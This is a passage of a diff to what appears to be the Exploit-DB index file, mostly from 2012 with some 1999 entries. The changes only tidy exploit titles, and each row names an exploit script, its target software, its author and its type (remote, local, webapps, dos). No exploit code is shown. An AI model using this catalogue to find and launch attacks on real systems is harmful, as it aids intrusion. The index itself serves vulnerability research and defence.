Vulnerability",2012-05-09,metasploit,windows,remote,0 @@ -16281,7 +16279,7 @@ id,file,description,date,author,platform,type,port 18853,platforms/windows/dos/18853.txt,"SAP Netweaver Dispatcher Multiple Vulnerabilities",2012-05-09,"Core Security",windows,dos,0 18855,platforms/linux/dos/18855.txt,"Asterisk 'ast_parse_digest()' Stack Buffer Overflow Vulnerability",2012-03-15,"Russell Bryant",linux,dos,0 18857,platforms/php/webapps/18857.txt,"Kerio WinRoute Firewall Web Server < 6 Source Code Disclosure",2012-05-10,"Andrey Komarov",php,webapps,0 -18858,platforms/php/webapps/18858.txt,"eLearning Server 4G Multiple Remote Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 +18858,platforms/php/webapps/18858.txt,"elearning server 4g Multiple Vulnerabilities",2012-05-10,"Andrey Komarov",php,webapps,0 18859,platforms/hardware/webapps/18859.txt,"Belkin N150 Wireless Router Password Disclosure",2012-05-11,"Avinash Tangirala",hardware,webapps,0 18861,platforms/windows/local/18861.php,"PHP 5.4 (5.4.3) Code Execution (Win32)",2012-05-11,0in,windows,local,0 18862,platforms/windows/local/18862.php,"Adobe Photoshop CS5.1 U3D.8BI Collada Asset Elements Stack Overflow",2012-05-11,rgod,windows,local,0 @@ -16293,7 +16291,7 @@ id,file,description,date,author,platform,type,port 18870,platforms/windows/remote/18870.rb,"Firefox 8/9 AttributeChildRemoved() Use-After-Free",2012-05-13,metasploit,windows,remote,0 18871,platforms/php/webapps/18871.txt,"Travelon Express CMS 6.2.2 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18872,platforms/php/webapps/18872.txt,"Proman Xpress 5.0.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 -18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS v0.8.1.1 Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 +18873,platforms/php/webapps/18873.txt,"Viscacha Forum CMS 0.8.1.1 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18874,platforms/php/webapps/18874.txt,"Free Realty 3.1-0.6 - Multiple Vulnerabilities",2012-05-13,Vulnerability-Lab,php,webapps,0 18875,platforms/php/webapps/18875.txt,"Galette (picture.php) SQL Injection Vulnerability",2012-05-13,sbz,php,webapps,0 18877,platforms/multiple/dos/18877.txt,"FlexNet License Server Manager Stack Overflow In lmgrd",2012-05-14,"Luigi Auriemma",multiple,dos,0 @@ -16313,14 +16311,14 @@ id,file,description,date,author,platform,type,port 18896,platforms/multiple/remote/18896.rb,"Squiggle 1.7 SVG Browser Java Code Execution",2012-05-19,metasploit,multiple,remote,0 18897,platforms/windows/remote/18897.rb,"Oracle Weblogic Apache Connector POST Request Buffer Overflow",2012-05-19,metasploit,windows,remote,0 18898,platforms/php/remote/18898.rb,"Active Collab ""chat module"" <= 2.3.8 Remote PHP Code Injection Exploit",2012-05-19,metasploit,php,remote,0 -18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 +18899,platforms/php/webapps/18899.txt,"PHP Address Book 7.0.0 - Multiple Vulnerabilities",2012-05-19,"Stefan Schurtz",php,webapps,0 18900,platforms/php/webapps/18900.txt,"FreeNAC 3.02 - SQL Injection and XSS Vulnerabilties",2012-05-19,Blake,php,webapps,0 18901,platforms/hardware/remote/18901.rb,"HP StorageWorks P4000 Virtual SAN Appliance Command Execution",2012-05-21,metasploit,hardware,remote,0 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 DAL File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0 18905,platforms/windows/local/18905.rb,"Foxit Reader 3.0 Open Execute Action Stack Based Buffer Overflow",2012-05-21,metasploit,windows,local,0 18908,platforms/php/webapps/18908.txt,"Vanilla Forums LatestComment 1.1 Plugin Persistent XSS",2012-05-18,"Henry Hoggard",php,webapps,0 -18909,platforms/php/dos/18909.php,"PHP <= 5.4.3 wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 +18909,platforms/php/dos/18909.php,"PHP <= 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Derefernce",2012-05-21,condis,php,dos,0 18910,platforms/php/dos/18910.php,"PHP <= 5.4.3 (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0 18911,platforms/php/webapps/18911.txt,"Vanilla Forums About Me Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 18912,platforms/php/webapps/18912.txt,"Vanilla FirstLastNames 1.3.2 Plugin Persistant XSS",2012-05-21,"Henry Hoggard",php,webapps,0 @@ -16332,29 +16330,29 @@ id,file,description,date,author,platform,type,port 18918,platforms/multiple/dos/18918.txt,"Wireshark DIAMETER Dissector Denial of Service",2012-05-24,Wireshark,multiple,dos,0 18919,platforms/multiple/dos/18919.txt,"Wireshark Multiple Dissector Denial of Service Vulnerabilities",2012-05-24,"Laurent Butti",multiple,dos,0 18920,platforms/multiple/dos/18920.txt,"Wireshark Misaligned Memory Denial of Service Vulnerability",2012-05-24,"Klaus Heckelmann",multiple,dos,0 -18921,platforms/php/webapps/18921.txt,"Jaow <= 2.4.5 Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 +18921,platforms/php/webapps/18921.txt,"Jaow <= 2.4.5 - Blind SQL Injection",2012-05-24,kallimero,php,webapps,0 18922,platforms/php/webapps/18922.rb,"appRain CMF Arbitrary PHP File Upload Vulnerability",2012-05-25,metasploit,php,webapps,0 18923,platforms/windows/local/18923.rb,"OpenOffice OLE Importer DocumentSummaryInformation Stream Handling Overflow",2012-05-25,metasploit,windows,local,0 -18926,platforms/windows/dos/18926.php,"bsnes v0.87 Local Denial Of Service",2012-05-25,"Yakir Wizman",windows,dos,0 -18927,platforms/php/webapps/18927.txt,"SocialEngine 4.2.2 Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 +18926,platforms/windows/dos/18926.php,"bsnes 0.87 - Local Denial Of Service",2012-05-25,"Yakir Wizman",windows,dos,0 +18927,platforms/php/webapps/18927.txt,"socialengine 4.2.2 - Multiple Vulnerabilities",2012-05-25,i4k,php,webapps,0 18929,platforms/windows/remote/18929.rb,"RabidHamster R4 Log Entry sprintf() Buffer Overflow",2012-05-25,metasploit,windows,remote,0 18931,platforms/hardware/dos/18931.rb,"iOS <= 5.1.1 Safari Browser - JS match(), search() Crash PoC",2012-05-25,"Alberto Ortega",hardware,dos,0 18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 Remote LFI Root Exploit",2012-05-26,muts,linux,remote,0 -18933,platforms/windows/remote/18933.rb,"QuickShare File Share 1.2.1 Directory Traversal Vulnerability",2012-05-27,metasploit,windows,remote,0 +18933,platforms/windows/remote/18933.rb,"quickshare file share 1.2.1 - Directory Traversal vulnerability",2012-05-27,metasploit,windows,remote,0 18934,platforms/php/webapps/18934.rb,"WeBid converter.php Remote PHP Code Injection",2012-05-27,metasploit,php,webapps,0 18935,platforms/php/webapps/18935.txt,"b2ePMS 1.0 multiple SQLi Vulnerabilities",2012-05-27,loneferret,php,webapps,0 18937,platforms/php/webapps/18937.txt,"PBBoard 2.1.4 Local File Inclusion",2012-05-28,n4ss1m,php,webapps,0 18940,platforms/windows/dos/18940.php,"LibreOffice 3.5.3 .rtf FileOpen Crash",2012-05-28,shinnai,windows,dos,0 -18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System v 1.0.2 Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 +18941,platforms/php/webapps/18941.txt,"PHP Volunteer Management System 1.0.2 - Multiple Vulnerabilities",2012-05-28,Ashoo,php,webapps,0 18942,platforms/linux/remote/18942.rb,"Symantec Web Gateway 5.0.2.8 Command Execution Vulnerability",2012-05-28,metasploit,linux,remote,0 -18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System v 1.0.2 Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 +18944,platforms/php/webapps/18944.txt,"PHP Volunteer Management System 1.0.2 - Multiple SQL Injection Vulnerabilities",2012-05-28,loneferret,php,webapps,0 18945,platforms/windows/dos/18945.txt,"WinRadius Server 2009 Denial Of Service",2012-05-29,demonalex,windows,dos,0 18946,platforms/windows/dos/18946.txt,"Tftpd32 DNS Server 4.00 Denial Of Service",2012-05-29,demonalex,windows,dos,0 18947,platforms/windows/local/18947.rb,"ispVM System XCF File Handling Overflow",2012-05-29,metasploit,windows,local,0 18948,platforms/php/webapps/18948.txt,"PBBoard 2.1.4 - Multiple SQL Injection Vulnerabilities",2012-05-29,loneferret,php,webapps,0 18950,platforms/php/webapps/18950.txt,"NewsAdd <= 1.0 - Multiple SQL Injection Vulnerabilities",2012-05-30,WhiteCollarGroup,php,webapps,0 18952,platforms/windows/dos/18952.txt,"Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability",2012-05-30,condis,windows,dos,0 -18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 +18953,platforms/php/webapps/18953.txt,"Ganesha Digital Library 4.0 - Multiple Vulnerabilities",2012-05-30,X-Cisadane,php,webapps,0 18954,platforms/windows/local/18954.rb,"MPlayer SAMI Subtitle File Buffer Overflow",2012-05-30,metasploit,windows,local,0 18955,platforms/php/webapps/18955.txt,"Simple Web Content Management System 1.1-1.3 Multiple SQL Injection",2012-05-30,loneferret,php,webapps,0 18956,platforms/windows/dos/18956.c,"GIMP 2.6 script-fu < 2.8.0 Buffer Overflow Vulnerability",2012-05-31,"Joseph Sheridan",windows,dos,0 @@ -16365,28 +16363,28 @@ id,file,description,date,author,platform,type,port 18961,platforms/php/webapps/18961.txt,"Supernews <= 2.6.1 (noticias.php cat) SQL Injection",2012-05-31,"Yakir Wizman",php,webapps,0 18962,platforms/windows/dos/18962.py,"Sorensoft Power Media 6.0 Denial of Service",2012-05-31,Onying,windows,dos,0 18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 -18965,platforms/php/webapps/18965.html,"4PSA VoipNow Professional 2.5.3 Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 +18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 -18970,platforms/php/webapps/18970.txt,"Membris v 2.0.1 Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 +18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0 -18974,platforms/php/webapps/18974.txt,"Vanilla Forum Tagging Plug-In Enchanced 1.0.1 Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 +18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18977,platforms/php/dos/18977.php,"PHP 5.3.10 spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18978,platforms/php/dos/18978.php,"PHP 5.3.10 spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18979,platforms/php/webapps/18979.txt,"Vanilla Forums Poll Plugin 0.9 Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 +18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 18982,platforms/windows/webapps/18982.txt,"Hexamail Server <= 4.4.5 Persistent XSS Vulnerability",2012-06-04,modpr0be,windows,webapps,0 18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 Remote Command Execution",2012-06-05,metasploit,multiple,remote,0 -18985,platforms/php/webapps/18985.txt,"PyroCMS 2.1.1 Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 +18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 -18988,platforms/php/webapps/18988.php,"Wordpress WP Marketplace Plugin 1.5.0 - 1.6.1 Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 18990,platforms/php/webapps/18990.php,"Wordpress HTML5 AV Manager Plugin 0.2.7 Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18991,platforms/php/webapps/18991.php,"Wordpress Foxypress Plugin 0.4.1.1 - 0.4.2.1 Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 @@ -16397,9 +16395,9 @@ id,file,description,date,author,platform,type,port 18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 Denial Of Service Vulnerability",2012-06-06,Onying,windows,dos,0 19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 -19003,platforms/php/webapps/19003.txt,"Vanilla kPoll Plugin 1.2 Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 +19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 -19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 (*.PAC) Exploit",2012-06-07,b33f,windows,local,0 +19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"Wordpress Front End Upload 0.5.3 Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 @@ -16421,9 +16419,9 @@ id,file,description,date,author,platform,type,port 19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,metasploit,windows,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 -19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 Multiple Vulnerabilities",2012-06-10,Kingcope,windows,remote,0 +19033,platforms/windows/remote/19033.txt,"microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,Kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 -19035,platforms/php/webapps/19035.txt,"FreePost 0.1 R1 Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 +19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0 19036,platforms/php/webapps/19036.php,"Wordpress Content Flow 3D Plugin 1.0.0 Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0 19037,platforms/windows/local/19037.rb,"MS12-005 Microsoft Office ClickOnce Unsafe Object Package Handling Vulnerability",2012-06-11,metasploit,windows,local,0 19038,platforms/php/webapps/19038.rb,"Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload Vulnerability",2012-06-10,metasploit,php,webapps,0 @@ -16448,7 +16446,7 @@ id,file,description,date,author,platform,type,port 19057,platforms/php/webapps/19057.txt,"Wordpress drag and drop file upload 0.1 Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 Arbitrary File Upload Vulnerability",2012-06-11,Misa3l,php,webapps,0 -19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 +19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 19066,platforms/irix/local/19066,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 @@ -16511,7 +16509,7 @@ id,file,description,date,author,platform,type,port 19129,platforms/multiple/remote/19129,"Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 19130,platforms/freebsd/local/19130.c,"FreeBSD <= 3.0 UNIX-domain panic Vulnerability",1999-05-05,"Lukasz Luzar",freebsd,local,0 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 -19132,platforms/php/webapps/19132.txt,"MYRE Real Estate Mobile 2012 Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 +19132,platforms/php/webapps/19132.txt,"myre real estate mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19133,platforms/php/webapps/19133.txt,"Cells Blog CMS 1.1 - Multiple Web Vulnerabilites",2012-06-14,Vulnerability-Lab,php,webapps,0 19134,platforms/php/webapps/19134.txt,"Swoopo Gold Shop CMS 8.4.56 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 19135,platforms/php/webapps/19135.txt,"Squirrelcart Cart Shop 3.3.4 - Multiple Web Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -16543,7 +16541,7 @@ id,file,description,date,author,platform,type,port 19175,platforms/windows/local/19175.rb,"Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",2012-06-17,metasploit,windows,local,0 19176,platforms/windows/local/19176.rb,"TFM MMPlayer (m3u/ppl File) Buffer Overflow",2012-06-15,metasploit,windows,local,0 19177,platforms/windows/remote/19177.rb,"ComSndFTP 1.3.7 Beta - USER Format String (Write4) Vulnerability",2012-06-15,metasploit,windows,remote,0 -19178,platforms/php/webapps/19178.txt,"WEBO Site SpeedUp <= 1.6.1 Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 +19178,platforms/php/webapps/19178.txt,"webo site speedup <= 1.6.1 - Multiple Vulnerabilities",2012-06-16,dun,php,webapps,0 19179,platforms/php/webapps/19179.txt,"PHP Decoda 3.3.1 Local File Inclusion",2012-06-16,"Number 7",php,webapps,0 19180,platforms/php/webapps/19180.txt,"News Script PHP 1.2 - Multiple Vulnerabilites",2012-06-16,Vulnerability-Lab,php,webapps,0 19181,platforms/windows/dos/19181.txt,"XnView RAS Image Processing Heap Overflow",2012-06-16,"Francis Provencher",windows,dos,0 @@ -16575,13 +16573,13 @@ id,file,description,date,author,platform,type,port 19210,platforms/irix/local/19210,"SGI IRIX <= 6.5.4 midikeys Root Vulnerability",1999-05-19,"W. Cashdollar",irix,local,0 19211,platforms/windows/local/19211.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 RAS Phonebook Buffer Overflow Vulnerability",1999-05-20,"David Litchfield",windows,local,0 19212,platforms/multiple/remote/19212,"Behold! Software Web Page Counter 2.7 Denial of Service Vulnerabilities",1999-05-19,"David Litchfield",multiple,remote,0 -19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 +19213,platforms/aix/local/19213.sh,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (1)",1999-05-22,UNYUN@ShadowPenguinSecurity,aix,local,0 19214,platforms/aix/local/19214.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (2)",1999-05-22,"Georgi Guninski",aix,local,0 19215,platforms/aix/local/19215.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (3)",1999-05-22,UNYUN,aix,local,0 19216,platforms/aix/local/19216.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (4)",1999-05-22,ahmed@securityfocus.com,aix,local,0 19217,platforms/aix/local/19217.c,"IBM AIX <= 4.2.1, Sun Solaris <= 7.0 LC_MESSAGES libc Buffer Overflow Vulnerability (5)",1999-05-22,UNYUN,aix,local,0 19218,platforms/linux/remote/19218.c,"Cat Soft Serv-U 2.5 Buffer Overflow Vulnerabilities",1999-05-03,"Arne Vidstrom",linux,remote,0 -19219,platforms/linux/remote/19219.c,"BisonWare BisonWare FTP Server 3.5 Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 +19219,platforms/linux/remote/19219.c,"bisonware bisonware ftp server 3.5 - Multiple Vulnerabilities",1999-05-17,"Arne Vidstrom",linux,remote,0 19220,platforms/windows/local/19220.c,"Allaire ColdFusion Server <= 4.0.1 CFCRYPT.EXE Vulnerability",1998-05-19,"Matt Chapman",windows,local,0 19221,platforms/multiple/remote/19221,"SmartDesk WebSuite 2.1 Buffer Overflow Vulnerability",1999-05-25,cmart,multiple,remote,0 19222,platforms/multiple/remote/19222,"Gordano NTMail 4.2 Web File Access Vulnerability",1999-05-25,Marc,multiple,remote,0 @@ -16602,7 +16600,7 @@ id,file,description,date,author,platform,type,port 19237,platforms/aix/remote/19237,"Gordano NTMail 3.0/5.0 SPAM Relay Vulnerability",1999-06-08,Geo,aix,remote,0 19238,platforms/windows/remote/19238,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3 DoS Duplicate Hostname Vulnerability",1999-06-04,"Carl Byington",windows,remote,0 19239,platforms/windows/remote/19239,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 IIS IDC Path Mapping Vulnerability",1999-06-04,"Scott Danahy",windows,remote,0 -19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1 -1,Caldera OpenLinux 1.3/2.2,KDE KDE 1.1/1.1.1, RedHat Linux 6.0 K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 +19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1 -1,Caldera OpenLinux 1.3/2.2,KDE KDE 1.1/1.1.1, RedHat Linux 6.0 K-Mail File Creation Vulnerability",1999-06-09,"Brian Mitchell",linux,local,0 19241,platforms/linux/remote/19241.c,"Debian Linux 2.1,Linux kernel 2.2/2.3,RedHat Linux 6.0,S.u.S.E. Linux 6.1 IP Options Vulnerability",1999-06-01,"Piotr Wilkin",linux,remote,0 19242,platforms/multiple/remote/19242,"CdomainFree <= 2.4 Remote File Execution Vulnerability",1999-06-01,"Salvatore Sanfilippo -antirez-",multiple,remote,0 19243,platforms/linux/local/19243,"G. Wilford man 2.3.10 Symlink Vulnerability",1999-06-02,"Thomas Fischbacher",linux,local,0 @@ -16683,13 +16681,13 @@ id,file,description,date,author,platform,type,port 19321,platforms/windows/webapps/19321.txt,"IBM System Storage DS Storage Manager Profiler Multiple Vulnerabilities",2012-06-21,LiquidWorm,windows,webapps,0 19322,platforms/windows/remote/19322.rb,"Apple iTunes <= 10.6.1.7 Extended m3u Stack Buffer Overflow",2012-06-21,Rh0,windows,remote,0 19323,platforms/windows/local/19323.c,"URL Hunter Buffer Overflow DEP Bypass",2012-06-21,Ayrbyte,windows,local,0 -19324,platforms/php/webapps/19324.txt,"Traq 2.3.5 Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 -19325,platforms/php/webapps/19325.txt,"Commentics 2.0 Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 +19324,platforms/php/webapps/19324.txt,"traq 2.3.5 - Multiple Vulnerabilities",2012-06-21,AkaStep,php,webapps,0 +19325,platforms/php/webapps/19325.txt,"Commentics 2.0 - Multiple Vulnerabilities",2012-06-21,"Jean Pascal Pereira",php,webapps,0 19326,platforms/solaris/local/19326,"Sun Solaris 7.0 procfs Vulnerability",1999-03-09,"Toomas Soome",solaris,local,0 19327,platforms/solaris/remote/19327.c,"Sun Solaris <= 2.5.1 rpc.statd rpc Call Relaying Vulnerability",1999-06-07,Anonymous,solaris,remote,0 19328,platforms/windows/dos/19328.txt,"Qutecom Softphone 2.2.1 Heap Overflow DoS/Crash Proof of Concept",2012-06-22,"Debasish Mandal",windows,dos,0 -19329,platforms/php/webapps/19329.txt,"Agora Project 2.13.1 Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 -19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 +19329,platforms/php/webapps/19329.txt,"agora project 2.13.1 - Multiple Vulnerabilities",2012-06-22,"Chris Russell",php,webapps,0 +19330,platforms/php/webapps/19330.txt,"LimeSurvey 1.92+ build120620 - Multiple Vulnerabilities",2012-06-22,dun,php,webapps,0 19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 RLE Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 PCT Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 GIF Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 @@ -16746,18 +16744,18 @@ id,file,description,date,author,platform,type,port 19388,platforms/windows/dos/19388.py,"Kingview Touchview 6.53 EIP Overwrite",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,555 19389,platforms/windows/dos/19389.txt,"Kingview Touchview 6.53 Multiple Heap Overflow Vulnerabilities",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 -19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server v 6.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 -19393,platforms/windows/dos/19393.py,"Able2Doc and Able2Doc Professional v 6.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19392,platforms/windows/dos/19392.py,"Able2Extract and 